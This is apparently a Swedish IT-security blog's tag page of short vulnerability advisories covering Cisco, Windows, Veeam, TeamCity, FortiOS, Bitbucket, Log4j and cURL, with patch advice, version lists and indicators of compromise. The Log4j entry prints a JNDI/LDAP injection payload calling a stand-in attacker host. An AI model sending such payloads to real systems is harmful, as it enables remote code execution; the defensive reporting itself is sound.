Taggat med: rce

Kritisk sårbarhet i Cisco IOS XE Wireless Controller – godtycklig filuppladdning möjlig

Cisco publicerade igår information om en allvarlig sårbarhet med det maximala CVSS-betyget 10 av 10! Sårbarheten påverkar Cisco IOS XE Software för Wireless LAN Controllers (WLCs) och kan utnyttjas av en obehörig extern angripare för att ladda upp godtyckliga filer till systemet. En lyckad attack kan i förlängningen ge angriparen möjlighet att köra kommandon med root-behörighet.

  • CVE-ID: CVE-2025-20188
  • CVSS-poäng: 10.0 (Kritisk)
  • Cisco Bug ID: CSCwk33139
  • CWE: CWE-798 (Hard-coded credentials)

Bakgrund

Sårbarheten beror på att en hårdkodad JSON Web Token (JWT) finns installerad. En angripare kan utnyttja detta genom att skicka HTTPS-förfrågningar till det API som används för Out-of-Band Access Point (AP) Image Download och då använda denna hårdkodade JWT.

Funktionen är inte aktiverad som standard som tur är, men om den är påslagen kan en lyckad attack möjliggöra:

  • Filuppladdning
  • Path traversal
  • Godtycklig kommandoexekvering som root (RCE)

Påverkade produkter

Sårbarheten påverkar följande Cisco-produkter om de kör sårbara versioner av IOS XE och har funktionen Out-of-Band AP Image Download aktiverad:

  • Catalyst 9800-CL Wireless Controllers för molnmiljöer
  • Catalyst 9800 Embedded Wireless Controller för Catalyst 9300, 9400 och 9500
  • Catalyst 9800 Series Wireless Controllers
  • Inbyggd Wireless Controller på Catalyst Access Points

Så kontrollerar du om din enhet är sårbar

Kör följande kommando:

show running-config | include ap upgrade

Om svaret innehåller:

ap upgrade method https

…är funktionen aktiverad och enheten potentiellt sårbar.

Ej påverkade produkter

Cisco har bekräftat att följande produkter ej påverkas:

  • IOS Software
  • IOS XE på enheter som inte är WLCs
  • IOS XR
  • Meraki-produkter
  • NX-OS
  • WLC med AireOS

Åtgärdsförslag

Cisco har släppt uppdateringar som åtgärdar problemet. Det finns inga workarounds i dagsläget, men man kan tillfälligt mildra sårbarheten genom att inaktivera Out-of-Band AP Image Download-funktionen. Detta påverkar inte AP-klienternas status eftersom standardmetoden Control And Provisioning of Wireless Access Points (CAPWAP) används då.

Sårbarheten identifierades internt på Cisco Advanced Security Initiatives Group (ASIG).

Källa

Windows RCE i LDAP

I tisdags var det återigen dags för Microsofts månatliga Patch-tisdag, och denna gång adresserades ett antal mycket allvarliga säkerhetsbrister. Totalt patchades 16 sårbarheter som möjliggör Remote Code Execution (RCE), varav flera klassas som kritiska.

Den brist med högst CVSSv3 base score var en sårbarhet i Windows LDAP-hantering som hamnar på hela 9.8. Som förmildrande åtgärd rekommenderar Microsoft att blockera inkommande RPC-anrop, samt förhindra helt utgående trafik från domänkontrollanter. Vid utnyttjande av bristen så erhåller en eventuell angripare samma rättigheter som LDAP-tjänsten. Samt så klart installera själva patchen som åtgärdar bristen (och övriga brister inom LDAP som listas nedan).

Extended Protection for Authentication (EPA), SMB signing och LDAP signing + channel binding är rekommenderat att använda generellt i Windows-miljöer för att höja säkerheten.

Även så har ett aktivt utnyttjande av en zero-day i Windows Common Log File System (CLFS) identifierats och patchats, CVE-2024-49138. Den har en något lägre CVSS på 7.8, främst för att det är en lokal brist men medger rättighetshöjningar.

Nedan följer en tabell med samtliga tre brister som åtgärdas i LDAP:

SeverityCVSS ScoreCVEDescription
Critical9.8CVE-2024-49112Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
Critical8.1CVE-2024-49124Windows Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
Critical8.1CVE-2024-49127Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Veeam Remote-Code-Execution

Veeam

Flertalet allvarliga säkerhetsbrister har uppdagats i mjukvaran Veeam Backup & Replication. Minst två av dessa sex säkerhetsbrister som uppdagats leter till RCE (Remote Code Execution). Sårbarheter i backup-mjukvara är synnerligen allvarligt då dessa som oftast kör med höga behörigheter och kan innehålla en guldgruva för ransomware-grupperingar.

  • Sårbarheterna gäller också följande produkter, inklusive Backup & Replication:
  • Veeam ONE
  • Veeam Service Provider Console
  • Veeam Agent for Linux
  • Veeam Backup for Nutanix AHV
  • Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization

Bristerna har identifierats av Florian Hauser från CODE WHITE GmbH och den högsta CVSS-scoren är på 9.8, vilket är kritisk nivå. Kan rekommendera följande läsning från Watchtowr.

Rekommenderat är att uppgradera till Veeam Backup & Replication version 12.2 (build 12.2.0.334).

Källa: Veeam security bulletin

0-klick RCE i Windows IPv6-stack åtgärdad

0-klick RCE i Windows IPv6-stack åtgärdad

Uppdatering: Enligt en källa på X (fd Twitter) så återfinnes sårbarheten i funktionen Ipv6pProcessOptions.

I veckan så var det dags för den månatliga patch-tisdagen, då Microsoft släpper viktiga buggfixar för Windows. Denna gång hanterades hela 90 CVE:er, varav en särskilt intressant sårbarhet stack ut: en 0-klick Remote Code Execution-sårbarhet i Windows TCP/IP-stack.

Detta innebär att skadlig kod kan fjärrexekveras på en Windows-server eller klient utan någon som helst användarinteraktion. Sårbarheten har identifierats som CVE-2024-38063 och återfinns specifikt i IPv6-delarna av TCP/IP-stacken. Den har tilldelats en allvarlighetsgrad på hela 9.8 och klassificeras som:

  • CWE-191: Integer Underflow (Wrap or Wraparound)

Denna kritiska sårbarhet upptäcktes av det kinesiska säkerhetsföretaget Kunlun Lab, och Microsoft har i sin säkerhetsrådgivning angivit att risken för utnyttjande är hög: Exploitation More Likely.

Rekommenderad åtgärd är att stänga av IPv6 temporärt alternativt installera denna månads säkerhetspatch.

Två nya allvarliga sårbarheter i TeamCity

JetBrains Teamcity

Det amerikanska säkerhetsföretaget Rapid7 har identifierat två nya allvarliga sårbarheter i JetBrains TeamCity CI/CD-server.

Sårbarheterna är enligt följande två CVEer:

  • CVE-2024-27198 – Denna sårbarhet gör att det är möjligt att ta sig förbi autentiseringen genom CWE-288 ”Authentication Bypass Using an Alternate Path or Channel”
  • CVE-2024-27199 – Gör också att det är möjligt att ta sig förbi autentisering i webbkomponenten genom CWE-22 ”Improper Limitation of a Pathname to a Restricted Directory/Path Traversal”

Dessa två sårbarheter har CVSS score på 9.8 (Critical) respektive 7.3 (High). Jetbrains som är företaget bakom TeamCity har släppt ett blogginlägg om sårbarheterna samt rekommenderar att organisationer uppdaterar till version 2023.11.4 snarast.

A remote unauthenticated attacker can leverage this to take complete control of a vulnerable TeamCity server.

Källa samt mer information hittas hos Rapid7.

Kritisk sårbarhet i FortiOS

Kritisk sårbarhet i FortiOS

CERT-SE gick ut med en varning gällande en kritisk sårbarhet i FortiOS från Fortinet. Sårbarheten medger kodexekvering över nätverk.

Sårbarheten återfinnes i FortiOS sslvpnd-process och är en heap-baserad sårbarhet. Genom att stänga av VPN i FortiOS så kan man förhindra att sårbarheten kan utnyttjas.

Fortigate har även gått ut och meddelat att denna sårbarhet används aktivt på internet. Användare av FortiGates produkter med VPN påslaget bör titta i loggfilerna efter följande meddelande:

Logdesc="Application crashed" and msg="[...] application:sslvpnd,[...], Signal 11 received, Backtrace: [...]“ 

Även så skrivs följande filer till filsystemet på FortiOS / Fortigate om enheten har blivit hackad:

/data/lib/libips.bak
/data/lib/libgif.so
/data/lib/libiptcp.so
/data/lib/libipudp.so
/data/lib/libjepg.so
/var/.sslvpnconfigbk
/data/etc/wxd.conf
/flash

Följande versioner är sårbara:

  • FortiOS version 7.2.0 till 7.2.2
  • FortiOS version 7.0.0 till 7.0.8
  • FortiOS version 6.4.0 till 6.4.10
  • FortiOS version 6.2.0 till 6.2.11
  • FortiOS version 6.0.0 till 6.0.15
  • FortiOS version 5.6.0 till 5.6.14
  • FortiOS version 5.4.0 till 5.4.13
  • FortiOS version 5.2.0 till 5.2.15
  • FortiOS version 5.0.0 till 5.0.14
  • FortiOS-6K7K version 7.0.0 till 7.0.7
  • FortiOS-6K7K version 6.4.0 till 6.4.9
  • FortiOS-6K7K version 6.2.0 till 6.2.11
  • FortiOS-6K7K version 6.0.0 till 6.0.14

Sårbarheten har CVE-2022-42475 och har kopplingar till ransomware-grupperingar som nyttjar denna sårbarhet för att installera ransomware. Se även information här på Franska.

Ny RCE i Bitbucket server

Atlassian Bitbucket

En 17-årig webbsäkerhetsforskare vid namn Maxwell ”TheGrandPew” Garret har identifierat en RCE-sårbarhet (Remote Code Execution) i mjukvaran Bitbucket Server och Bitbucket Data Center.

Sårbarheten har CVE-2022-36804 och går att utnyttja där en angripare har läsrättigheter till privata repon. Sårbarheten är av typen command injection vulnerability. Har ni en server av typen Bitbucket Mesh så måste även denna uppgraderas.

En workaround har även släppts av Atlassian som går ut på att temporärt stänga va publik access:

feature.public.access=false

Ovan inställning gör att sårbarheten går från att vara icke-autentiserad RCE till autentiserad RCE. Läs mer hos Atlassian på följande länk.

TheGrandPew meddelar även att en PoC kommer att släppas i slutet av september:

Allvarlig sårbarhet i Log4j

Uppdatering: Listan över sårbara applikationer och system bara växer. Nu senast har det visat sig att Ghidra från NSA är sårbart. Sårbarheten har fått det fyndiga namnet Log4Shell

Uppdatering 2: Nu har någon börjat att sammanställa en lista med sårbara system: https://twitter.com/80vul/status/1469250599846027265

Uppdatering 3: Sårbarheten har fått CVE-2021-44228. Uppdateringen log4j-2.15.0-rc1 var bristfällig så därför har log4j-2.15.0-rc2 släppts.

Uppdatering 4: Nu har version 2.16.0 släppts som helt stänger av JDNI som standard.

Log4j är ett populärt bibliotek som används för spårbarhet och loggning, flertalet populära system och produkter använder log4j såsom: Apple iCloud, Steam, Minecraft och Elasticsearch. Sårbarheten kan medge fjärrexekvering av kod (Remote Code Execution, RCE).

En bra payload för att testa är följande:

${jndi:ldap://attacker.com/a}

Ovan payload använder sig av Java Naming and Directory Interface och LDAP för att försöka ansluta till attacker.com. Givetvis kan även Burp Suite Collaborator också användas eller interact.sh för att detektera kommunikation (OOB).

För att åtgärda bristen kan version log4j-2.15.0-rc1 av log4j installeras eller så kan man sätta inställningen log4j2.formatMsgNoLookups till true.

Se även denna tråd på HackerNews.

Flertalet mediaspelare sårbara via undertexter

Cybersäkerhetsforskare vid företaget Check Point har identifierat sårbarheter i en mängd populära mediaspelare. Sårbarheten ligger i hur dessa mediaspelare hanterar filer med undertexter och kan ge en angripare RCE (Remote Code Execution).

Och att just använda undertexter som en attackvektor är intressant eftersom många antivirus-produkter inte söker igenom undertext-filer efter skadlig kod. Samt så har mediaspelaren VLC över 170 miljoner nedladdningar vilket gör den till ett attraktivt mål. Det finns även över 25 olika format för undertexter som dessa olika mediaspelare stödjer.

Följande mediaspelare har sårbarheter och uppdateringar har släppts:

Video som demonstrerar sårbarheten:

Cure53 granskar cURL

curlTyska IT-säkerhetsföretaget Cure53 har nu släppt en rapport gällande granskning av cURL. Granskningen sponsrades av Mozillas Secure Open Source och identifierade 23 säkerhetsrelaterade problem i källkoden.

Koden granskades av fem personer under 20 dagar samt så var fokus på cURL version 7.50.1. Av dessa 23 identifierade problem så var 9 st klassade som sårbarheter och 14 st som generella svagheter.

Fyra sårbarheter kan troligtvis leda till RCE (Remote Code Execution). Men du kan dock vara lugn för samtliga dessa rapporterade brister har åtgärdats den 2:a November och en uppgradering 7.71.0 löser problemen.

För mer information se curls säkerhetssida här:

Eller loggen för åtgärder som finnes på Google Docs.

Samt så kan du ladda hem Cure53:s rapport som PDF i sin helhet här nedan. Som vanligt så är det alltid intressant att läsa andras granskningar och således själv lära och bli en bättre granskare.

Cure53 granskning av cURL